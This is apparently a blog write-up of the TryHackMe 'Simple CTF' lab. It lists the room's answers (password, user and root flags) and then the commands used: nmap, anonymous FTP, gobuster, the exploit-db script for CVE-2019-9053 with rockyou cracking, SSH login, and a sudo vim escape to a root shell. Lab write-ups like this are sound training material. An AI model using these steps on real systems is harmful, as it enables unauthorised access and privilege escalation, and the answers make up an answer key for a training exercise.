Simple CTF - TryHackMe Problem Solving
1. How many services are running under port 1000?
Ans: 2
2. What is running on the higher port?
Ans: ssh
3. What's the CVE you're using against the application?
Ans: CVE-2019-9053
4. To what kind of vulnerability is the application vulnerable?
Ans: sqli
5. What's the password?
Ans: secret
6. Where can you login with the details obtained?
Ans: ssh
7. What's the user flag?
Ans: G00d j0b, keep up!
8. Is there any other user in the home directory? What's its name?
Ans: sunbath
9. What can you leverage to spawn a privileged shell?
Ans: vim
10. What's the root flag?
Ans: W3ll d0n3. You made it!
==================Problem Solving Step ===========
1. First of all openvpn
2. Scan with nmap
cmd: nmap -A ip address
cmd: ftp ip address
cmd: anonymous
cmd: ls
cmd: cd pub
cmd: ls
cmd: mget *
then: y
cmd: bye
cmd: less ForMitch.txt
cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
get directory "simple"
3. Go to browser on ip/simple
Get cms version
4. Search google exploit-db website and find out cms version - type "cms made simple"
cmd: pip3 install termcolor
cmd: python3 46635.py -u http:/ip/simple/
or cmd:
python3 46635.py -u http://10.10.230.104/simple/ --crack -w /usr/share/wordlists/rockyou.txt New cmd: hashcat -O -a 0 -m 20 hashPassword:sitPassword /usr/share/wordlists/rockyou.txt
Get Password
cmd: ssh mitch@ip -p port_number
input yes and password
cmd:ls
cmd: cat user.txt
cmd: bash
cmd: ls
cmd: cat user.txt
cmd: ls /home
Get "sunbath"
cmd: sudo -l
Get vim
5. Go to browser to "gtfobins" and find out vim and copy
" sudo vim -c ':!/bin/sh' "
mitch@Machine:~$
cmd: sudo vim -c ':!/bin/sh'
cmd: whoami
cmd: cd root
cmd: ls
cmd: cat root.txt
Comments
Post a Comment